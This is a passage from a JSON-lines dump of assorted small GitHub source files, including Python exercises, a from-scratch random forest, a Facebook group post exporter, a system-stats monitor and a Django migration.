TypeError(\"matrix must be a matrix (list of lists)\"\n \" of integers/floats\")\n if not all(isinstance(num, (int, float)) for row in matrix for num in row):\n raise TypeError(\"matrix must be a matrix (list of lists)\"\n \" of integers/floats\")\n row_sizes = [len(row) for row in matrix]\n if not all(size == row_sizes[0] for size in row_sizes):\n raise TypeError(\"Each row of the matrix must have the same size\")\n if not isinstance(div, (int, float)):\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise TypeError(\"division by zero\")\n\n return [list(map(lambda x: round(x / div, 2), 
row)) for row in matrix]\n","repo_name":"mwesigwa2/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11540358636","text":"## Tuples ##\r\n\r\n# 1) Define a Tuple\r\n# 2) Indexing in Tuples\r\n# 3) Difference between a List and a Tuple\r\n\r\n# 1) Define a Tuple\r\n\r\nprime_numbers = (2,3,5,7,11)\r\ntype(prime_numbers)\r\n\r\nperfect_squares = [1,4,9,16,25,36]\r\ntype(perfect_squares)\r\n\r\nlen(prime_numbers)\r\nlen(perfect_squares)\r\n\r\nmy_tuple = (\"Hieee\", 100, 12.47)\r\nmy_tuple\r\ntype(my_tuple)\r\n\r\n# 2) Indexing in Tuples\r\nmy_tuple[0]\r\nmy_tuple[1]\r\nmy_tuple[0:2]\r\nmy_tuple[-1]\r\n\r\nmy_tuple.count(100)\r\n\r\n\r\n# 3) Difference between a List and a Tuple\r\n\r\nl = [\"a\", \"b\", \"c\", \"d\", \"e\"]\r\nt = (\"a\", \"b\", \"c\", \"d\", \"e\")\r\ntype(l)\r\ntype(t)\r\n\r\nl[0] = \"New Element\"\r\nl\r\nt[0] = \"New Element\"  # raises TypeError: a tuple is an immutable sequence of objects\r\n","repo_name":"JN1995/Programming-Languages","sub_path":"python for Beginner/datatype/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"886032596","text":"from sklearn import svm, metrics\nfrom sklearn.model_selection import train_test_split\nfrom classes.sample import Sample\nimport joblib\n\n\n\n\npredictSample = []\n\nB = Sample(\"./out/blaise_processed.wav\")\nJM = Sample(\"./out/julien_processed.wav\")\nYM = Sample(\"./out/marguet_processed.wav\")\nV = Sample(\"./out/valerie_processed.wav\")\nY = Sample(\"./out/yacine_processed.wav\")\n\n\nmerged, target = Sample.concat()\n\nx_train, x_test, y_train, y_test = train_test_split(merged, target)\nclf = svm.SVC(probability=True)\nclf.fit(x_train, y_train)\n\n\n\n\nres = clf.predict(x_test)\nres = res.tolist()\n\n\nprint(\"Accuracy was : \", metrics.accuracy_score(y_test, res))\n\njoblib.dump(clf, \"./model/model.pkl\") ","repo_name":"MartTave/SpeakerRecognition","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36217121972","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 26 21:52:51 2019\r\n\r\n@author: Dominick\r\n\"\"\"\r\n\r\nimport sqlite3\r\nimport random\r\nimport time\r\nimport PIL\r\n#import nltk\r\n#from nltk.stem.lancaster import LancasterStemmer\r\n# word stemmer\r\n#stemmer = LancasterStemmer()\r\n\r\nfrom time import sleep\r\nfrom facepy import GraphAPI\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\n\r\nimport xlsxwriter\r\n\r\nclass extract_posts():\r\n    def __init__(self, group_id, api_key):\r\n        '''\r\n        Initialize: store the group's ID and the API key associated with the group.\r\n        The Facepy API key is essential; without it, we can't scrape any data.\r\n        '''\r\n        self.grp_id = group_id\r\n        # the API key; make sure to get this\r\n        self.face_py = api_key\r\n        \r\n    def open_workbook(self, col_names, out_file):\r\n        '''\r\n        Opens an Excel workbook and one sheet for use. 
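A minimal, hypothetical call (the column names and file name here are made up for illustration):\r\n\r\n            wb, sheet = self.open_workbook([\"Poster\", \"Message\"], \"out.xlsx\")\r\n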
\r\n        I'm considering adding a way to add a second sheet.\r\n        \r\n        Note: this function may behave oddly if it reads a comment made by\r\n        your own account. If the account that the facepy app is tied to made\r\n        a comment, there is no \"name\" key to look up for that account's\r\n        username.\r\n        \r\n        Comments are also \"indented\" under the post they belong to. At most\r\n        there are two comment layers, since that's Facebook's limit.\r\n        '''\r\n        wb = xlsxwriter.Workbook(out_file)\r\n        sheet1 = wb.add_worksheet()\r\n        cnt = 0\r\n        for i in col_names:\r\n            sheet1.set_column(cnt, cnt, 70)\r\n            sheet1.write(0, cnt, i)\r\n            cnt += 1\r\n        return wb, sheet1\r\n    \r\n    def extract_posts(self, output_file):\r\n        '''\r\n        Extracts the posts\r\n        '''\r\n        # initialize graph\r\n        graph = GraphAPI(self.face_py)\r\n        col_names = [\"Poster\", \"Message\", \"Time\"]\r\n        # open a workbook\r\n        wb, sheet1 = self.open_workbook(col_names, output_file)\r\n        sheet1.set_column(3, 3, 70)\r\n        sheet1.set_column(4, 4, 40)\r\n        sheet1.set_column(5, 5, 40)\r\n        \r\n        # the group feed we're extracting from\r\n        x = graph.get(path = str(self.grp_id) + '/feed', page = False, retry = 3)\r\n        cnt = 1\r\n        for i in range(len(x['data'])):\r\n            if \"message\" in x['data'][i].keys():\r\n                # the post we're extracting from\r\n                y = graph.get(path = str(x['data'][i][\"id\"]) + \"?fields=from\", \r\n                              page = False, retry = 3)\r\n                \r\n                if \"from\" in y.keys():\r\n                    name = (y[\"from\"][\"name\"])\r\n                else:\r\n                    name = \"(you)\"\r\n                sheet1.write(cnt, 0, name)\r\n                sheet1.write(cnt, 1, x['data'][i]['message'])\r\n                sheet1.write(cnt, 2, x['data'][i]['updated_time'])\r\n                \r\n                # comments library\r\n                comments = graph.get(path = str(x['data'][i][\"id\"]) + \"?fields=comments\", \r\n                                     page = False, retry = 3)\r\n                # checking if there are comments\r\n                if \"comments\" in comments.keys():\r\n                    # use a fresh loop variable (j) rather than shadowing the outer i\r\n                    for j in range(len(comments[\"comments\"][\"data\"])):\r\n                        cnt += 1\r\n                        sheet1.write(cnt, 1, comments[\"comments\"][\"data\"][j][\"from\"][\"name\"])\r\n                        sheet1.write(cnt, 2, comments[\"comments\"][\"data\"][j]['message'])\r\n                        sheet1.write(cnt, 3, comments[\"comments\"][\"data\"][j]['created_time'])\r\n                        comments_2nd_layer = graph.get(path = str(comments[\"comments\"][\"data\"][j][\"id\"]) + \"?fields=comments\", \r\n                                                       page = False, retry = 3)\r\n                        \r\n                        # checking if the comments themselves have comments; Facebook allows only two layers\r\n                        
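# (illustrative) response shape this block relies on:\r\n                        # {\"comments\": {\"data\": [{\"from\": {\"name\": ...}, \"message\": ..., \"created_time\": ...}]}}\r\n                        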
if \"comments\" in comments_2nd_layer.keys():\r\n                            for k in range(len(comments_2nd_layer[\"comments\"][\"data\"])):\r\n                                cnt += 1\r\n                                sheet1.write(cnt, 2, comments_2nd_layer[\"comments\"][\"data\"][k][\"from\"][\"name\"])\r\n                                sheet1.write(cnt, 3, comments_2nd_layer[\"comments\"][\"data\"][k]['message'])\r\n                                sheet1.write(cnt, 4, comments_2nd_layer[\"comments\"][\"data\"][k]['created_time'])\r\n                        \r\n            cnt += 1\r\n        # close workbook\r\n        wb.close()\r\n        \r\n    ","repo_name":"edtsoi430/Townhall.digital","sub_path":"get_posts_and_userid.py","file_name":"get_posts_and_userid.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16059039554","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : 最大子数组和-动态规划.py\n@Time : 2022/4/10\n@Author: Tk \n@Software: PyCharm\n\nInput:\n-2,1,-3,4,-1,2,1,-5,4\nOutput:\n6\n\"\"\"\nnums = list(map(int, input().split(\",\")))\n\n\nclass Solution:\n    def maxSubArray(self, nums) -> int:\n        # Kadane's algorithm, scanning right to left: temp holds the best\n        # sum of a subarray that starts at index i\n        n = len(nums)\n        temp = nums[-1]\n        max_num = temp\n        for i in range(n-2, -1, -1):\n            temp = temp + nums[i] if temp > 0 else nums[i]\n            max_num = max(max_num, temp)\n\n        return max_num\n\n\ns = Solution()\nresult = s.maxSubArray(nums)\nprint(result)\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"TOP100/数组/最大子数组和-动态规划.py","file_name":"最大子数组和-动态规划.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25079817275","text":"import unittest\nimport utils.logger\n\nfrom training.expression import Expression\nfrom knowledge import knn_colour\n\nutils.logger.display_log(\"langframe.data.ColourLogger\")\n\nclass TestAddingExpressions(unittest.TestCase):\n    def setUp(self):\n        self.knowledge = knn_colour.KNNColourSemantics(\"example\")\n\n    def testLearnSingle(self):\n        red_expr = Expression([\"COLOUR\", \"r_255\", \"g_0\", \"b_10\"])\n        self.knowledge.learn(\"red\", red_expr)\n        self.assertIn((255, 0, 10), self.knowledge.points)\n        self.assertIn(\"red\", self.knowledge.words)\n\n    def testKNearest(self):\n        black_expr = Expression([\"COLOUR\", \"r_0\", \"g_0\", \"b_0\"])\n        dark_red = Expression([\"COLOUR\", \"r_125\", \"g_0\", \"b_0\"])\n        reddish_expr = Expression([\"COLOUR\", \"r_250\", \"g_25\", \"b_30\"])\n\n        self.knowledge.learn(\"black\", black_expr)\n        self.knowledge.learn(\"red\", dark_red)\n        self.knowledge.learn(\"red\", reddish_expr)\n\n        self.knowledge.word_for(Expression([\"COLOUR\", \"r_255\", \"g_0\", \"b_0\"]))\n        # placeholder: the expected word_for() result has not been asserted yet\n        self.assertTrue(False)\n\n\n    def testNoColourLabel(self):\n        black_expr = Expression([\"COLOUR\", \"r_0\", \"g_0\", \"b_0\"])\n        dark_red = Expression([\"COLOUR\", \"r_125\", \"g_0\", \"b_0\"])\n        reddish_expr = Expression([\"COLOUR\", \"r_250\", \"g_25\", \"b_30\"])\n\n        self.knowledge.learn(\"black\", black_expr)\n        self.knowledge.learn(\"red\", dark_red)\n        self.knowledge.learn(\"red\", reddish_expr)\n\n        self.assertEqual(self.knowledge.expression_for(\"blue\"), Expression(\"MISUNDERSTOOD\"))\n\n    def testReturnColourValue(self):\n        black_expr = Expression([\"COLOUR\", \"r_0\", \"g_0\", \"b_0\"])\n        dark_red = Expression([\"COLOUR\", \"r_125\", \"g_0\", \"b_0\"])\n        reddish_expr = Expression([\"COLOUR\", \"r_250\", \"g_25\", \"b_30\"])\n\n        self.knowledge.learn(\"black\", black_expr)\n        self.knowledge.learn(\"red\", dark_red)\n        self.knowledge.learn(\"red\", reddish_expr)\n\n        self.knowledge.expression_for(\"red\")\n\nif __name__ == '__main__':\n    
unittest.main()\n","repo_name":"samwhitehall/langframe","sub_path":"knowledge/tests/colour_test.py","file_name":"colour_test.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27247890110","text":"\n# Creating some colors\nBLUE = (0, 0, 255)\nGRAYBLUE = (50, 120, 120)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n# define directions\nUP = 0\nDOWN = 2\nLEFT = 1\nRIGHT = 3\n\nSENSOR = 2\nSENSOR_COUNT = 5\nANT_MOVES = 5\nBATTERY_STATUS = 70\n\n# The information heuristic factor\nALPHA = 1.9\n# the expectation heuristic factor\nBETA = 0.9\n\n# define index variations\nDIRECTIONS = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\nINF = 999999","repo_name":"GeorgeDanicico/Artificial-Intelligence-Year2","sub_path":"Assignment4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8644307415","text":"import random\nimport pandas as pd\nimport numpy as np\n\ndef entropy(p):\n    # binary (Shannon) entropy of a class proportion p; entropy(0.5) == 1.0\n    if p == 0:\n        return 0\n    elif p == 1:\n        return 0\n    else:\n        return - (p * np.log2(p) + (1 - p) * np.log2(1-p))\n\ndef information_gain(left_child, right_child):\n    # IG = H(parent) - weighted sum of the children's entropies\n    parent = left_child + right_child\n    p_parent = parent.count(1) / len(parent) if len(parent) > 0 else 0\n    p_left = left_child.count(1) / len(left_child) if len(left_child) > 0 else 0\n    p_right = right_child.count(1) / len(right_child) if len(right_child) > 0 else 0\n    IG_p = entropy(p_parent)\n    IG_l = entropy(p_left)\n    IG_r = entropy(p_right)\n    return IG_p - len(left_child) / len(parent) * IG_l - len(right_child) / len(parent) * IG_r\n\ndef draw_bootstrap(X_train, y_train):\n    bootstrap_indices = list(np.random.choice(range(len(X_train)), len(X_train), replace = True))\n    oob_indices = [i for i in range(len(X_train)) if i not in bootstrap_indices]\n    X_bootstrap = X_train.iloc[bootstrap_indices].values\n    y_bootstrap = y_train[bootstrap_indices]\n    X_oob = X_train.iloc[oob_indices].values\n    y_oob = y_train[oob_indices]\n    return X_bootstrap, y_bootstrap, X_oob, y_oob\n\ndef oob_score(tree, X_test, y_test):\n    mis_label = 0\n    for i in range(len(X_test)):\n        pred = predict_tree(tree, X_test[i])\n        if pred != y_test[i]:\n            mis_label += 1\n    return mis_label / len(X_test)\n\ndef find_split_point(X_bootstrap, y_bootstrap, max_features):\n    feature_ls = list()\n    num_features = len(X_bootstrap[0])\n\n    # sample exactly max_features distinct candidate feature indices\n    while len(feature_ls) < max_features:\n        feature_idx = random.sample(range(num_features), 1)[0]\n        if feature_idx not in feature_ls:\n            feature_ls.append(feature_idx)\n\n    best_info_gain = -999\n    node = None\n    for feature_idx in feature_ls:\n        for split_point in X_bootstrap[:,feature_idx]:\n            left_child = {'X_bootstrap': [], 'y_bootstrap': []}\n            right_child = {'X_bootstrap': [], 'y_bootstrap': []}\n\n            # split children for continuous variables\n            if type(split_point) in [int, float]:\n                for i, value in enumerate(X_bootstrap[:,feature_idx]):\n                    if value <= split_point:\n                        left_child['X_bootstrap'].append(X_bootstrap[i])\n                        left_child['y_bootstrap'].append(y_bootstrap[i])\n                    else:\n                        right_child['X_bootstrap'].append(X_bootstrap[i])\n                        right_child['y_bootstrap'].append(y_bootstrap[i])\n            # split children for categoric variables\n            else:\n                for i, value in enumerate(X_bootstrap[:,feature_idx]):\n                    if value == split_point:\n                        left_child['X_bootstrap'].append(X_bootstrap[i])\n                        left_child['y_bootstrap'].append(y_bootstrap[i])\n                    else:\n                        
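# values that do not match the categorical split point fall to the right child\n                        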
right_child['X_bootstrap'].append(X_bootstrap[i])\n                        right_child['y_bootstrap'].append(y_bootstrap[i])\n\n            split_info_gain = information_gain(left_child['y_bootstrap'], right_child['y_bootstrap'])\n            if split_info_gain > best_info_gain:\n                best_info_gain = split_info_gain\n                left_child['X_bootstrap'] = np.array(left_child['X_bootstrap'])\n                right_child['X_bootstrap'] = np.array(right_child['X_bootstrap'])\n                node = {'information_gain': split_info_gain,\n                        'left_child': left_child,\n                        'right_child': right_child,\n                        'split_point': split_point,\n                        'feature_idx': feature_idx}\n\n    return node\n\ndef terminal_node(node):\n    y_bootstrap = node['y_bootstrap']\n    pred = max(y_bootstrap, key = y_bootstrap.count)\n    return pred\n\n\ndef split_node(node, max_features, min_samples_split, max_depth, depth):\n    left_child = node['left_child']\n    right_child = node['right_child']\n\n    del(node['left_child'])\n    del(node['right_child'])\n\n    if len(left_child['y_bootstrap']) == 0 or len(right_child['y_bootstrap']) == 0:\n        empty_child = {'y_bootstrap': left_child['y_bootstrap'] + right_child['y_bootstrap']}\n        node['left_split'] = terminal_node(empty_child)\n        node['right_split'] = terminal_node(empty_child)\n        return\n\n    if depth >= max_depth:\n        node['left_split'] = terminal_node(left_child)\n        node['right_split'] = terminal_node(right_child)\n        return node\n\n    # only an undersized side becomes a leaf; the other side is still split\n    if len(left_child['X_bootstrap']) <= min_samples_split:\n        node['left_split'] = terminal_node(left_child)\n    else:\n        node['left_split'] = find_split_point(left_child['X_bootstrap'], left_child['y_bootstrap'], max_features)\n        split_node(node['left_split'], max_features, min_samples_split, max_depth, depth + 1)\n    if len(right_child['X_bootstrap']) <= min_samples_split:\n        node['right_split'] = terminal_node(right_child)\n    else:\n        node['right_split'] = find_split_point(right_child['X_bootstrap'], right_child['y_bootstrap'], max_features)\n        split_node(node['right_split'], max_features, min_samples_split, max_depth, depth + 1)\n\ndef build_tree(X_bootstrap, y_bootstrap, max_depth, min_samples_split, max_features):\n    root_node = find_split_point(X_bootstrap, y_bootstrap, max_features)\n    split_node(root_node, max_features, min_samples_split, max_depth, 1)\n    return root_node\n\ndef random_forest(X_train, y_train, n_estimators, max_features, max_depth, min_samples_split):\n    tree_ls = list()\n    oob_ls = list()\n    for i in range(n_estimators):\n        X_bootstrap, y_bootstrap, X_oob, y_oob = draw_bootstrap(X_train, y_train)\n        # positional arguments follow build_tree's signature:\n        # (X, y, max_depth, min_samples_split, max_features)\n        tree = build_tree(X_bootstrap, y_bootstrap, max_depth, min_samples_split, max_features)\n        tree_ls.append(tree)\n        oob_error = oob_score(tree, X_oob, y_oob)\n        oob_ls.append(oob_error)\n    #print(\"OOB estimate: {:.2f}\".format(np.mean(oob_ls)))\n    return tree_ls\n\ndef predict_tree(tree, X_test):\n    feature_idx = tree['feature_idx']\n\n    # assumes numeric features at predict time; categorical splits (built with ==)\n    # would need an equality test here instead of <=\n    if X_test[feature_idx] <= tree['split_point']:\n        if type(tree['left_split']) == dict:\n            return predict_tree(tree['left_split'], X_test)\n        else:\n            value = tree['left_split']\n            return value\n    else:\n        if type(tree['right_split']) == dict:\n            return predict_tree(tree['right_split'], X_test)\n        else:\n            return tree['right_split']\n    \ndef predict_rf(tree_ls, X_test):\n    pred_ls = list()\n    for i in range(len(X_test)):\n        ensemble_preds = [predict_tree(tree, X_test.values[i]) for tree in tree_ls]\n        final_pred = max(ensemble_preds, key = ensemble_preds.count)\n        pred_ls.append(final_pred)\n    return np.array(pred_ls)\n\ndef feature_selection(X, y, k):\n    # Calculate the correlation coefficients between each feature and the 
y variable\n    correlations = np.array([np.corrcoef(X[:, i], y)[0, 1] for i in range(X.shape[1])])\n    \n    # Get the absolute values of the correlation coefficients\n    abs_correlations = np.abs(correlations)\n    \n    # Select the top 'k' features with the highest absolute correlation coefficients\n    top_k_indices = np.argsort(abs_correlations)[-k:]\n    x_selected = X[:, top_k_indices]\n    \n    return x_selected, top_k_indices\n\ndef feature_selection_value(X, y, feature_names=None):\n    # default to positional feature names when no column names are supplied\n    if feature_names is None:\n        feature_names = [str(i) for i in range(X.shape[1])]\n    \n    # Calculate the correlation coefficients between each feature and the y variable\n    correlations = np.array([np.corrcoef(X[:, i], y)[0, 1] for i in range(X.shape[1])])\n    \n    # Get the absolute values of the correlation coefficients\n    abs_correlations = np.abs(correlations)\n    \n    # Sort the features by ascending order of absolute correlation coefficients\n    sorted_indices = np.argsort(abs_correlations)\n    sorted_correlations = abs_correlations[sorted_indices]\n    sorted_features = [feature_names[i] for i in sorted_indices]\n\n    return sorted_features, sorted_correlations\n\ndef cross_validation_ConfusionMatrix(X, y, k):\n\n    \"\"\"\n    Performs k-fold cross-validation with the from-scratch random forest on the input data.\n    \n    Args:\n        X: a numpy array of input features.\n        y: a numpy array of target labels.\n        k: an integer indicating the number of folds for cross-validation.\n    \n    Returns:\n        mean_accuracy: a float representing the average accuracy across all folds.\n        confusion_matrix: a 2*2 numpy array\n    \"\"\"\n    # Define the number of classes\n    num_classes = 2\n\n    # Initialize the confusion matrix\n    confusion_matrix = np.zeros((num_classes, num_classes))\n\n    # Split the data into k folds\n    X_folds = np.array_split(X, k)\n    y_folds = np.array_split(y, k)\n    \n    fold_accuracies = []\n\n    # Loop through each fold\n    for i in range(k):\n        # Set up training and testing data for this fold\n        X_train = np.concatenate(X_folds[:i] + X_folds[i+1:])\n        y_train = np.concatenate(y_folds[:i] + y_folds[i+1:])\n        X_test = X_folds[i]\n        y_test = y_folds[i]\n        \n        if isinstance(X_train, np.ndarray):\n            # Train the model on the training data\n            model = random_forest(pd.DataFrame(X_train), y_train, n_estimators=100, max_features=5, max_depth=10, min_samples_split=1)\n            preds = predict_rf(model, pd.DataFrame(X_test)).flatten()\n        \n        \n        # Calculate the accuracy for this fold\n        fold_accuracy = sum(preds == y_test) / len(y_test)\n        fold_accuracies.append(fold_accuracy)\n        \n        # Iterate over each example\n        for j in range(len(y_test)):\n            true_class = y_test[j]\n            pred_class = preds[j]\n            confusion_matrix[true_class, pred_class] += 1\n    \n    # Calculate the mean accuracy as the final accuracy\n    mean_accuracy = np.mean(fold_accuracies)\n\n    return mean_accuracy, confusion_matrix\n\n\ndef train_test_split(X, y, test_size=0.25, random_state=None):\n    \"\"\"\n    Split arrays or matrices into random train and test subsets.\n\n    Parameters\n    ----------\n    X : numpy array-like, shape (n_samples, n_features)\n        The input data.\n\n    y : numpy array-like, shape (n_samples,)\n        The target values.\n\n    test_size : float, optional (default=0.25)\n        The proportion of the dataset to include in the test split.\n\n    random_state : int or RandomState, optional (default=None)\n        If int, random_state is the seed used by the random number generator;\n        If RandomState instance, random_state is the random number generator.\n\n    Returns\n    -------\n    X_train : numpy array-like, shape (n_train_samples, n_features)\n        
The training input samples.\n\n X_test : numpy array-like, shape (n_test_samples, n_features)\n The test input samples.\n\n y_train : numpy array-like, shape (n_train_samples,)\n The training target values.\n\n y_test : numpy array-like, shape (n_test_samples,)\n The test target values.\n \"\"\"\n\n # Set random seed if specified\n if random_state is not None:\n np.random.seed(random_state)\n\n # Get number of samples\n n_samples = X.shape[0]\n\n # Shuffle indices\n indices = np.random.permutation(n_samples)\n\n # Calculate number of test samples\n n_test_samples = int(test_size * n_samples)\n\n # Get test indices\n test_indices = indices[:n_test_samples]\n\n # Get train indices\n train_indices = indices[n_test_samples:]\n\n # Split data into train and test subsets\n X_train = X[train_indices]\n X_test = X[test_indices]\n y_train = y[train_indices]\n y_test = y[test_indices]\n\n return X_train, X_test, y_train, y_test\n\ndef calculate_feature_importance(X, y, model, column_names):\n \"\"\"\n Calculate the feature importance for a random forest model without using sklearn.\n \n Parameters:\n X (numpy.ndarray): The input feature matrix.\n y (numpy.ndarray): The target variable array.\n model (numpy.ndarray): The trained random forest model.\n column_names (list): The names of columns\n \n Returns:\n pandas.DataFrame: A dataframe containing the feature importance values sorted in descending order.\n \"\"\"\n \n # Get the number of features\n n_features = X.shape[1]\n \n # Initialize an empty array to hold the importance scores\n importance = np.zeros(n_features)\n \n # Calculate the importance of each feature\n for i in range(n_features):\n # Get the predictions for the original data\n y_pred = predict_rf(model, pd.DataFrame(X))\n\n # Shuffle the values of the ith feature\n X_shuffled = X.copy()\n np.random.shuffle(X_shuffled[:, i])\n\n # Get the predictions for the shuffled data\n y_pred_shuffled = predict_rf(model, pd.DataFrame(X_shuffled))\n\n # Calculate the importance score as the difference in accuracy\n importance[i] = np.mean((y_pred - y_pred_shuffled) ** 2)\n\n # Normalize the importance scores\n importance = importance / np.sum(importance)\n\n # Create a pandas dataframe with the importance scores and feature names\n feature_names = [column_names[i] for i in range(n_features)]\n importance_df = pd.DataFrame({\"importance\": importance, \"feature\": feature_names})\n\n # Sort the dataframe in descending order of importance\n importance_df = importance_df.sort_values(\"importance\", ascending=False).reset_index(drop=True)\n\n return importance_df\n\ndef cross_validate(model, X, y, k = 3):\n \"\"\"\n Performs k-fold cross-validation on the input model using the input data.\n \n Args:\n model: a function or callable class that takes in X_train and y_train as arguments and returns a trained model.\n X: a numpy array of input features.\n y: a numpy array of target labels.\n k: an integer indicating the number of folds for cross-validation.\n \n Returns:\n avg_score: a float representing the average score across all folds.\n \"\"\"\n\n # Split the data into k folds\n X_folds = np.array_split(X, k)\n y_folds = np.array_split(y, k)\n \n scores = []\n # Perform k-fold cross-validation\n for i in range(k):\n # Set up training and testing data for this fold\n X_train = np.concatenate(X_folds[:i] + X_folds[i+1:])\n y_train = np.concatenate(y_folds[:i] + y_folds[i+1:])\n X_test = X_folds[i]\n y_test = y_folds[i]\n \n X_train = pd.DataFrame(X_train)\n\n # Train the model on the training data\n 
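# note: the 'model' parameter passed to cross_validate is effectively ignored;\n        # a fresh forest is trained on each fold's training split\n        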
model = random_forest(X_train, y_train, n_estimators=100, max_features=5, max_depth=10, min_samples_split=2)\n \n preds = predict_rf(model, pd.DataFrame(X_test)).flatten()\n acc_score = sum(preds == y_test) / len(y_test)\n # Evaluate the model on the testing data\n scores.append(acc_score)\n \n # Calculate the average score across all folds\n avg_score = sum(scores) / k\n \n return avg_score","repo_name":"acloop62hz/Colorectal-Liver-Metastases-Recurrence-Prediction-from-Clinical-and-CT-Image-Data","sub_path":"Random_Forest/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70131141492","text":"from bpsk_dsss.utils import get_repeated_bits_count\nfrom math import floor, log10\n\n\nsymbol_length_bits = 8 # bits per symbol\nsample_rate = 32768 # samples per second\nsymbol_rate = 1 # symbols(characters) per second\nsample_rate_power = round(log10(sample_rate))\n\nmodulation_carrier_frequency = 128\nmodulation_carrier_amplitude = 1\n\ndemodulation_filter_order = 6\ndemodulation_filter_cutoff_frequency = modulation_carrier_frequency/2\n\ndsss_code_frequency = 32\n\noriginal_signal_path = './data/test_bpsk_dsss.raw'\nmodulated_signal_path = './data/test_bpsk_dsss_modulated.raw'\ndecoded_signal_path = './data/test_bpsk_dsss_decoded.raw'\nresults_path = './data/results/'\n\n# original_signal_data = 'Hello, World!'\noriginal_signal_data = 'Prenosni sistemi'\n\n\nplot_subsample_start = floor(1e4)\nplot_subsample_length = floor(1e5)/4\nplot_subsample_end = floor(plot_subsample_start + plot_subsample_length)\nplot_subsample_downsample_factor = 1\nplot_filetype = '.svg'\n# plot_filetype = '.png'\n\n# Test the configuration:\nrepeated_bits_count = get_repeated_bits_count(sample_rate, symbol_rate, symbol_length_bits)\n\nnoise_amplitude = 8\n","repo_name":"ZigaBobnar/gps-signal-analysis","sub_path":"bpsk_dsss/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12324851407","text":"from tkinter.constants import BOTH, CENTER, E, LEFT, RIGHT, TOP, W, YES, X\nimport psutil\nimport tkinter as tk\n\ndef main():\n def gui():\n root = tk.Tk()\n root.title(\"STATS\")\n root.attributes('-topmost', True)\n\n #Change the name in the window\n def change_label(labelname, text):\n labelname.configure(text=text)\n\n def mem_stats():\n return str(round(psutil.virtual_memory().total/1000000)) + '/' + str(round(psutil.virtual_memory().used/1000000))\n\n def update_usage():\n change_label(label_cpu_percentage, psutil.cpu_percent())\n change_label(label_mem_percentage, psutil.virtual_memory().percent)\n change_label(label_mem_used, mem_stats())\n root.after(300, update_usage)\n\n frame_cpu = tk.Frame(root)\n\n label_cpu = tk.Label(frame_cpu, text='CPU', font='Calibri 18',width=10, anchor=W)\n label_cpu_percentage = tk.Label(frame_cpu, text=psutil.cpu_percent(), font='Calibri 18',width=10, anchor=W)\n label_cpu.pack(side=LEFT,fill=X)\n label_cpu_percentage.pack(side=LEFT,fill=X)\n\n frame_cpu.pack(fill=BOTH, expand=YES)\n\n frame_mem = tk.Frame(root)\n\n label_mem = tk.Label(frame_mem, text='MEM', font='Calibri 18',width=10, anchor=W)\n label_mem_percentage = tk.Label(frame_mem, text=psutil.virtual_memory().percent, font='Calibri 18',width=10, anchor=W)\n\n label_mem_used = tk.Label(frame_mem, text=mem_stats(), font='Calibri 18',width=10, anchor=W)\n\n 
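# pack the three memory labels left to right, mirroring the CPU row above\n        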
label_mem.pack(side=LEFT,fill=X)\n label_mem_percentage.pack(side=LEFT,fill=X)\n label_mem_used.pack(side=LEFT,fill=X)\n\n frame_mem.pack(fill=BOTH, expand=YES)\n\n \n root.after(300, update_usage)\n\n root.mainloop()\n\n gui()\n\nif __name__ == \"__main__\":\n main()","repo_name":"AdmiralPuni/trawler","sub_path":"performance-stat.pyw","file_name":"performance-stat.pyw","file_ext":"pyw","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71280394933","text":"import urllib.request\n\nfile = urllib.request.urlopen('http://data.pr4e.org/romeo.txt')\nwords = dict()\n\nfor line in file:\n for word in line.decode().rstrip().split():\n words[word] = words.get(word, 0) + 1\n\nprint(words)\n","repo_name":"sitek94/python","sub_path":"12_networking/web_browser_with_urllib.py","file_name":"web_browser_with_urllib.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8039883244","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pet', '0003_auto_20160624_1630'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='activity',\n name='activity_pet_type',\n field=models.IntegerField(default=0),\n ),\n migrations.AddField(\n model_name='activity',\n name='activity_price',\n field=models.DecimalField(default=0.0, max_digits=20, decimal_places=2),\n ),\n 